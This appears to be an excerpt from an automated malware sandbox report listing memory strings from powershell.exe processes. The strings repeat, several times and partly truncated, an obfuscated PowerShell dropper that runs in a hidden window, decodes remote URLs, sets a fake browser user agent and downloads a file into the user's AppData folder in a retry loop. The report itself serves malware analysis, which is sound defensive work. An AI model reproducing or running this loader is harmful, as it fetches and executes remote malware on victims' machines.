Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFE7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Host Application = powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
              Source: powershell.exe, 00000002.00000002.2360203175.0000020B5AC65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
              Source: powershell.exe, 00000005.00000002.2196876058.0000000002C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshi
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(K
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: rentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
